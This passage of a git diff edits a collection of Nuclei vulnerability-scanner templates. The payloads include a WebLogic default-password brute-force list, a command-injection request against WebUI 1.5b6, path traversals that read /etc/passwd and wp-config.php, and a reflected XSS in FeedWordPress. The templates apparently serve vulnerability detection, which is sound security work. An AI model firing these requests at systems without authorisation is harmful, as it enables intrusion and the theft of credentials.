+ severity: info
+ description: Check T3 protocol status.
+ tags: network,weblogic
+
+network:
+ - inputs:
+ - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
+ host:
+ - "{{Hostname}}"
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "HELO"
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "HELO:(.*).false"
+
+ - inputs:
+ - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
+ host:
+ - "tls://{{Hostname}}"
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "HELO"
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "HELO:(.*).false"
diff --git a/poc/web/weblogic-weak-login-11154.yaml b/poc/web/weblogic-weak-login-11154.yaml
deleted file mode 100644
index 3cf788b3b9..0000000000
--- a/poc/web/weblogic-weak-login-11154.yaml
+++ /dev/null
@@ -1,68 +0,0 @@
-id: weblogic-weak-login
-
-info:
- name: WebLogic Default Login
- author: pdteam
- description: WebLogic default login credentials were discovered.
- severity: high
- tags: default-login,weblogic
- reference:
- - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
-
-requests:
- - raw:
- - |
- GET /console/ HTTP/1.1
- Host: {{Hostname}}
-
- - |
- POST /console/j_security_check HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8
-
- attack: pitchfork
- payloads:
- username:
- - weblogic
- - weblogic
- - weblogic
- - weblogic
- - weblogic
- - admin
- - admin
- - system
-
- password:
- - weblogic
- - weblogic1
- - welcome1
- - Oracle@123
- - weblogic123
- - 12345678
- - security
- - password
-
- stop-at-first-match: true
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "/console/index.jsp"
- - "ADMINCONSOLESESSION"
- condition: and
-
- - type: status
- status:
- - 302
-
-# Enhanced by mp on 2022/03/14
diff --git a/poc/web/weblogic-weak-login-11155.yaml b/poc/web/weblogic-weak-login-11155.yaml
index 11d03f834a..454abb185f 100644
--- a/poc/web/weblogic-weak-login-11155.yaml
+++ b/poc/web/weblogic-weak-login-11155.yaml
@@ -1,18 +1,10 @@
id: weblogic-weak-login
info:
- name: WebLogic Default Login
+ name: WebLogic weak login
author: pdteam
- description: WebLogic default login credentials were discovered.
severity: high
tags: default-login,weblogic
- reference:
- - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
+ reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
requests:
- raw:
- |
@@ -57,5 +49,3 @@ requests:
- type: status
status:
- 302
-
-# Enhanced by mp on 2022/03/14
diff --git a/poc/web/webmin-panel-11158.yaml b/poc/web/webmin-panel-11158.yaml
index 9700b94700..4ddaa63d7d 100644
--- a/poc/web/webmin-panel-11158.yaml
+++ b/poc/web/webmin-panel-11158.yaml
@@ -3,7 +3,7 @@ info:
name: Webmin Admin Panel
author: PR3R00T
severity: info
- tags: panel,webmin
+ tags: panel
requests:
- method: GET
path:
diff --git a/poc/web/webmodule-ee-panel-11160.yaml b/poc/web/webmodule-ee-panel-11160.yaml
index 481c672663..3e78190052 100644
--- a/poc/web/webmodule-ee-panel-11160.yaml
+++ b/poc/web/webmodule-ee-panel-11160.yaml
@@ -3,10 +3,9 @@ info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
- reference:
- - https://www.exploit-db.com/ghdb/7001
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
+ reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
diff --git a/poc/web/webmodule-ee-panel-11161.yaml b/poc/web/webmodule-ee-panel-11161.yaml
new file mode 100644
index 0000000000..481c672663
--- /dev/null
+++ b/poc/web/webmodule-ee-panel-11161.yaml
@@ -0,0 +1,28 @@
+id: webmodule-ee-panel
+info:
+ name: Webmodule Login Panel
+ author: pussycat0x,daffainfo
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/7001
+ metadata:
+ google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
+ tags: panel,webmodule-ee,login
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webmodule-ee/login.seam"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Webmodule"
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Version: ([0-9.]+)'
diff --git a/poc/web/webmodule-ee-panel.yaml b/poc/web/webmodule-ee-panel.yaml
index fe04d1f518..11a84abdd2 100644
--- a/poc/web/webmodule-ee-panel.yaml
+++ b/poc/web/webmodule-ee-panel.yaml
@@ -1,23 +1,15 @@
id: webmodule-ee-panel
info:
- name: Webmodule Login Panel - Detect
+ name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
- description: Webmodule login panel was detected.
- reference:
- - https://www.exploit-db.com/ghdb/7001
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
metadata:
- max-request: 1
- shodan-query: title:"Webmodule"
- google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
- tags: edb,panel,webmodule-ee,login
+ google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
+ reference: https://www.exploit-db.com/ghdb/7001
+ tags: panel,webmodule-ee,login
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
@@ -37,6 +29,4 @@ http:
part: body
group: 1
regex:
- - 'Version: ([0-9.]+)'
-
-# digest: 4a0a004730450220087462ce19f174f51de6ca4c406c32d809f6d2ad04722728bf918130bfb202dd022100d66b008c6cd7a8e102dae0107f458e9a1e8fb4e6e6ffa0b4352668890f50d263:922c64590222798bb761d5b6d8e72950
+ - 'Version: ([0-9.]+)'
\ No newline at end of file
diff --git a/poc/web/webui-rce-11170.yaml b/poc/web/webui-rce-11170.yaml
index 372b5a39ce..09b1d2e004 100644
--- a/poc/web/webui-rce-11170.yaml
+++ b/poc/web/webui-rce-11170.yaml
@@ -1,32 +1,21 @@
id: webui-rce
-
info:
- name: WebUI 1.5b6 - Remote Code Execution
+ name: WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
- description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
- reference:
- - https://www.exploit-db.com/exploits/36821
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
+ description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
+ reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce
-
requests:
- method: GET
path:
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
-
matchers-condition: and
matchers:
- type: word
words:
- "c5b3d7397a90f42d222f7ed9408c0dc6"
part: body
-
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/06/03
diff --git a/poc/web/webui-rce.yaml b/poc/web/webui-rce.yaml
new file mode 100644
index 0000000000..372b5a39ce
--- /dev/null
+++ b/poc/web/webui-rce.yaml
@@ -0,0 +1,32 @@
+id: webui-rce
+
+info:
+ name: WebUI 1.5b6 - Remote Code Execution
+ author: pikpikcu
+ severity: critical
+ description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/36821
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: webui,rce
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "c5b3d7397a90f42d222f7ed9408c0dc6"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/poc/web/webview-addjavascript-interface-11176.yaml b/poc/web/webview-addjavascript-interface-11176.yaml
new file mode 100644
index 0000000000..06e26a26dd
--- /dev/null
+++ b/poc/web/webview-addjavascript-interface-11176.yaml
@@ -0,0 +1,16 @@
+id: webview-addjavascript-interface
+
+info:
+ name: Webview addJavascript Interface Usage
+ author: gaurang
+ severity: info
+ tags: android,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
\ No newline at end of file
diff --git a/poc/web/webview-addjavascript-interface-11177.yaml b/poc/web/webview-addjavascript-interface-11177.yaml
deleted file mode 100644
index 8e94cd6411..0000000000
--- a/poc/web/webview-addjavascript-interface-11177.yaml
+++ /dev/null
@@ -1,12 +0,0 @@
-id: webview-addjavascript-interface
-info:
- name: Webview addJavascript Interface Usage
- author: gaurang
- severity: info
-file:
- - extensions:
- - all
- matchers:
- - type: word
- words:
- - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
diff --git a/poc/web/webview-addjavascript-interface.yaml b/poc/web/webview-addjavascript-interface.yaml
index 06e26a26dd..5a57c8f6d3 100644
--- a/poc/web/webview-addjavascript-interface.yaml
+++ b/poc/web/webview-addjavascript-interface.yaml
@@ -1,16 +1,22 @@
id: webview-addjavascript-interface
info:
- name: Webview addJavascript Interface Usage
+ name: Android WebView Add Javascript Interface - Detect
author: gaurang
severity: info
+ description: Android WebView Add Javascript interface usage was detected.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cwe-id: CWE-200
tags: android,file
-
file:
- extensions:
- all
-
matchers:
- type: word
words:
- - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
\ No newline at end of file
+ - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
+
+# Enhanced by md on 2023/05/02
+# digest: 490a0046304402203981bdb59f2dcb96fc32d914a6ad857c3ab9cc7a7e13721fbb70d5e02d56479602203f304de4f54bc79bb48097452fe53cf82aed0a50741027791fecdc92909a32a0:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/webview-javascript-11178.yaml b/poc/web/webview-javascript-11178.yaml
index a89445fa50..026d8c3ec9 100644
--- a/poc/web/webview-javascript-11178.yaml
+++ b/poc/web/webview-javascript-11178.yaml
@@ -3,6 +3,7 @@ info:
name: Webview JavaScript enabled
author: gaurang
severity: info
+ tags: android,file,javascript
file:
- extensions:
- all
diff --git a/poc/web/webview-load-url-11180.yaml b/poc/web/webview-load-url-11180.yaml
new file mode 100644
index 0000000000..a45be3958b
--- /dev/null
+++ b/poc/web/webview-load-url-11180.yaml
@@ -0,0 +1,13 @@
+id: webview-load-url
+info:
+ name: Webview loadUrl usage
+ author: gaurang
+ severity: info
+ tags: android,file
+file:
+ - extensions:
+ - all
+ matchers:
+ - type: word
+ words:
+ - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
diff --git a/poc/web/webview-load-url-11181.yaml b/poc/web/webview-load-url-11181.yaml
deleted file mode 100644
index d258156df2..0000000000
--- a/poc/web/webview-load-url-11181.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: webview-load-url
-
-info:
- name: Webview loadUrl usage
- author: gaurang
- severity: info
- tags: android,file
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
\ No newline at end of file
diff --git a/poc/web/webview-load-url.yaml b/poc/web/webview-load-url.yaml
index 3bcfd9ace9..d258156df2 100644
--- a/poc/web/webview-load-url.yaml
+++ b/poc/web/webview-load-url.yaml
@@ -1,22 +1,16 @@
id: webview-load-url
info:
- name: WebView loadUrl - Detect
+ name: Webview loadUrl usage
author: gaurang
severity: info
- description: WebView loadUrl usage was detected.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
tags: android,file
+
file:
- extensions:
- all
+
matchers:
- type: word
words:
- - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
-
-# Enhanced by md on 2023/05/02
-# digest: 4a0a0047304502203e6573c6bd46a8ffccb46b934de85f8489aa4206ace3c395eb97ded8a483ca6d022100dc2c1947834d8746ee19b34dc7ca18c67691235cb4d04c3530b52d9a072cdf22:922c64590222798bb761d5b6d8e72950
+ - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
\ No newline at end of file
diff --git a/poc/web/webview-universal-access-11183.yaml b/poc/web/webview-universal-access-11183.yaml
new file mode 100644
index 0000000000..11b8a99339
--- /dev/null
+++ b/poc/web/webview-universal-access-11183.yaml
@@ -0,0 +1,13 @@
+id: webview-universal-access
+info:
+ name: Webview Universal Access enabled
+ author: gaurang
+ severity: medium
+ tags: android,file
+file:
+ - extensions:
+ - all
+ matchers:
+ - type: word
+ words:
+ - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
diff --git a/poc/web/webview-universal-access-11184.yaml b/poc/web/webview-universal-access-11184.yaml
deleted file mode 100644
index 56fe5fb8ac..0000000000
--- a/poc/web/webview-universal-access-11184.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: webview-universal-access
-
-info:
- name: Webview Universal Access enabled
- author: gaurang
- severity: medium
- tags: android,file
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
\ No newline at end of file
diff --git a/poc/web/webview-universal-access.yaml b/poc/web/webview-universal-access.yaml
index 2497ace769..56fe5fb8ac 100644
--- a/poc/web/webview-universal-access.yaml
+++ b/poc/web/webview-universal-access.yaml
@@ -1,22 +1,16 @@
id: webview-universal-access
info:
- name: Android WebView Universal Access - Detect
+ name: Webview Universal Access enabled
author: gaurang
severity: medium
- description: Android WebView Universal Access enabling was detected.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cwe-id: CWE-200
tags: android,file
+
file:
- extensions:
- all
+
matchers:
- type: word
words:
- - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
-
-# Enhanced by md on 2023/05/03
-# digest: 4a0a00473045022100a47e2082fc66a04948c89867eea66d41624cf5a26a7e0e6faebecd5e18281a74022025ef3b1093b7cfa7eeb45aea5a30518577674355526f2621c96bde80d175642a:922c64590222798bb761d5b6d8e72950
+ - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
\ No newline at end of file
diff --git a/poc/web/xp-webcam-11697.yaml b/poc/web/xp-webcam-11697.yaml
index 01384bf68e..421bc7db2d 100644
--- a/poc/web/xp-webcam-11697.yaml
+++ b/poc/web/xp-webcam-11697.yaml
@@ -1,30 +1,22 @@
id: xp-webcam
-
info:
name: XP Webcam Viewer Page
author: aashiq
severity: medium
description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body.
- metadata:
- max-request: 1
tags: webcam,iot
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/mobile.html"
-
matchers-condition: and
matchers:
- type: word
words:
- "webcams and ip cameras server for windows"
part: body
-
- type: word
words:
- "Please provide a valid username/password to access this server."
part: body
negative: true
-
-# digest: 4a0a00473045022100a435ebb71da78f120da21b3a41e2dc738c4a89d58184864b14162c511961cf9902205e84e119bca58b017260c792c99fafd18f2dd0e414e439d119bad04929610fd2:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/xp-webcam-11699.yaml b/poc/web/xp-webcam-11699.yaml
deleted file mode 100644
index f7578077c4..0000000000
--- a/poc/web/xp-webcam-11699.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: xp-webcam
-
-info:
- name: XP Webcam Viewer Page
- author: aashiq
- severity: medium
- description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body.
- tags: webcam,iot
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/mobile.html"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "webcams and ip cameras server for windows"
- part: body
-
- - type: word
- words:
- - "Please provide a valid username/password to access this server."
- part: body
- negative: true
diff --git a/poc/web/zoho-webhook-token-11837.yaml b/poc/web/zoho-webhook-token-11837.yaml
new file mode 100644
index 0000000000..f7db738d3a
--- /dev/null
+++ b/poc/web/zoho-webhook-token-11837.yaml
@@ -0,0 +1,22 @@
+id: zoho-webhook-token
+
+info:
+ name: Zoho Webhook Disclosure
+ author: Ice3man
+ severity: info
+ metadata:
+ max-request: 1
+ tags: exposure,token,zoho
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'
+
+# digest: 490a0046304402201d16cd7598f919216af5d3a94ecfedadac3e055ca4d65d33633b8652af5f26da022008cbf1ad2c43b7dbb7af3a2f3ca2854ff3c959d40c26edad703203eda40e5b6c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/WP-Vault-LFI.yaml b/poc/wordpress/WP-Vault-LFI.yaml
index b6ff21a22b..b097857a82 100644
--- a/poc/wordpress/WP-Vault-LFI.yaml
+++ b/poc/wordpress/WP-Vault-LFI.yaml
@@ -1,33 +1,24 @@
id: wp-vault-local-file-inclusion
info:
- name: WordPress Vault 0.8.6.6 - Local File Inclusion
+ name: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
author: 0x_Akoko
severity: high
- description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
- reference:
- - https://www.exploit-db.com/exploits/40850
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- metadata:
- max-request: 1
- tags: lfi,edb,wp-plugin,wordpress
+ reference: https://www.exploit-db.com/exploits/40850
+ tags: wp,lfi
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
+
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:[x*]:0:0"
- type: status
status:
- 200
-
-# digest: 4a0a00473045022100b6716a61414f29710ea8749e7662c327f86cb11dd12935bd97c696830ad5df1602201503de5ec7aa5bb13732ce57472e7b7c52e1bd8563745017fc47da0b0db7a41d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/alfacgiapi-wordpress-255.yaml b/poc/wordpress/alfacgiapi-wordpress-255.yaml
index d3b9faa070..69b0d39f88 100644
--- a/poc/wordpress/alfacgiapi-wordpress-255.yaml
+++ b/poc/wordpress/alfacgiapi-wordpress-255.yaml
@@ -1,33 +1,30 @@
-id: alfacgiapi-wordpress
-
-info:
- name: alfacgiapi
- author: pussycat0x
- severity: low
- description: Searches for sensitive directories present in the ALFA_DATA.
- reference: https://www.exploit-db.com/ghdb/6999
- tags: wordpress,listing
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-includes/ALFA_DATA/"
- - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
- - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
- - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Index of"
- - type: word
- words:
- - "/wp-content/plugins/"
- - "/wp-includes/ALFA_DATA/"
- - "/ALFA_DATA/alfacgiapi/"
- - "/cgi-bin/ALFA_DATA/alfacgiapi/"
- condition: or
- - type: status
- status:
- - 200
+id: alfacgiapi-wordpress
+info:
+ name: alfacgiapi
+ author: pussycat0x
+ severity: low
+ description: Searches for sensitive directories present in the ALFA_DATA.
+ reference: https://www.exploit-db.com/ghdb/6999
+ tags: wordpress,listing
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-includes/ALFA_DATA/"
+ - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
+ - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
+ - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - type: word
+ words:
+ - "/wp-content/plugins/"
+ - "/wp-includes/ALFA_DATA/"
+ - "/ALFA_DATA/alfacgiapi/"
+ - "/cgi-bin/ALFA_DATA/alfacgiapi/"
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/alfacgiapi-wordpress-257.yaml b/poc/wordpress/alfacgiapi-wordpress-257.yaml
index f8d61143d9..ea09ed84de 100644
--- a/poc/wordpress/alfacgiapi-wordpress-257.yaml
+++ b/poc/wordpress/alfacgiapi-wordpress-257.yaml
@@ -1,33 +1,30 @@
-id: alfacgiapi-wordpress
-
-info:
- name: alfacgiapi
- author: pussycat0x
- severity: low
- description: Searches for sensitive directories present in the ALFA_DATA.
- reference: https://www.exploit-db.com/ghdb/6999
- tags: wordpress,listing
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-includes/ALFA_DATA/"
- - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
- - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
- - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Index of"
- - type: word
- words:
- - "/wp-content/plugins/"
- - "/wp-includes/ALFA_DATA/"
- - "/ALFA_DATA/alfacgiapi/"
- - "/cgi-bin/ALFA_DATA/alfacgiapi/"
- condition: or
- - type: status
- status:
- - 200
+id: alfacgiapi-wordpress
+info:
+ name: alfacgiapi
+ author: pussycat0x
+ severity: low
+ description: Searches for sensitive directories present in the ALFA_DATA.
+ reference: https://www.exploit-db.com/ghdb/6999
+ tags: wordpress,listing
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-includes/ALFA_DATA/"
+ - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/"
+ - "{{BaseURL}}/ALFA_DATA/alfacgiapi/"
+ - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - type: word
+ words:
+ - "/wp-content/plugins/"
+ - "/wp-includes/ALFA_DATA/"
+ - "/ALFA_DATA/alfacgiapi/"
+ - "/cgi-bin/ALFA_DATA/alfacgiapi/"
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/easy-wp-smtp-listing-7154.yaml b/poc/wordpress/easy-wp-smtp-listing-7154.yaml
deleted file mode 100644
index 4e6298c0c5..0000000000
--- a/poc/wordpress/easy-wp-smtp-listing-7154.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: easy-wp-smtp-listing
-info:
- name: SMTP WP Plugin Directory listing enabled
- author: PR3R00T
- severity: high
- description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
- reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
- tags: wordpress,wp-plugin,smtp
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
- matchers:
- - type: word
- words:
- - "debug"
- - "log"
- - "Index of"
- condition: and
diff --git a/poc/wordpress/empowerwp-e011f0fe3c18de1eb10e2fd479a3ee1d.yaml b/poc/wordpress/empowerwp-e011f0fe3c18de1eb10e2fd479a3ee1d.yaml
new file mode 100644
index 0000000000..c7921ff233
--- /dev/null
+++ b/poc/wordpress/empowerwp-e011f0fe3c18de1eb10e2fd479a3ee1d.yaml
@@ -0,0 +1,59 @@
+id: empowerwp-e011f0fe3c18de1eb10e2fd479a3ee1d
+
+info:
+ name: >
+ EmpowerWP <= 1.0.21 - Cross-Site Request Forgery to Notice Dismissal
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a533ddd4-cf89-4bf9-981e-2fdd4ff4d414?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/empowerwp/"
+ google-query: inurl:"/wp-content/themes/empowerwp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,empowerwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/empowerwp/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "empowerwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.21')
\ No newline at end of file
diff --git a/poc/wordpress/feedwordpress-xss-7459.yaml b/poc/wordpress/feedwordpress-xss-7459.yaml
deleted file mode 100644
index 6aab768ed3..0000000000
--- a/poc/wordpress/feedwordpress-xss-7459.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: feedwordpress-xss
-info:
- name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
- author: dhiyaneshDk
- severity: medium
- description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
- reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
- tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- - |
- GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
- Host: {{Hostname}}
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '">
" method="post">'
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/feedwordpress-xss.yaml b/poc/wordpress/feedwordpress-xss.yaml
index 20970f5d7f..6aab768ed3 100644
--- a/poc/wordpress/feedwordpress-xss.yaml
+++ b/poc/wordpress/feedwordpress-xss.yaml
@@ -4,8 +4,7 @@ info:
author: dhiyaneshDk
severity: medium
description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
- reference:
- - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
+ reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
requests:
- raw:
diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml
new file mode 100644
index 0000000000..6dcdea6319
--- /dev/null
+++ b/poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml
@@ -0,0 +1,23 @@
+id: nativechurch-wp-theme-lfd
+info:
+ name: WordPress NativeChurch Theme Arbitrary File Download
+ author: 0x_Akoko
+ severity: high
+ tags: wordpress,wp-theme,lfi
+ description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable.
+ reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml
index 6dcdea6319..5ce4bfe007 100644
--- a/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml
+++ b/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml
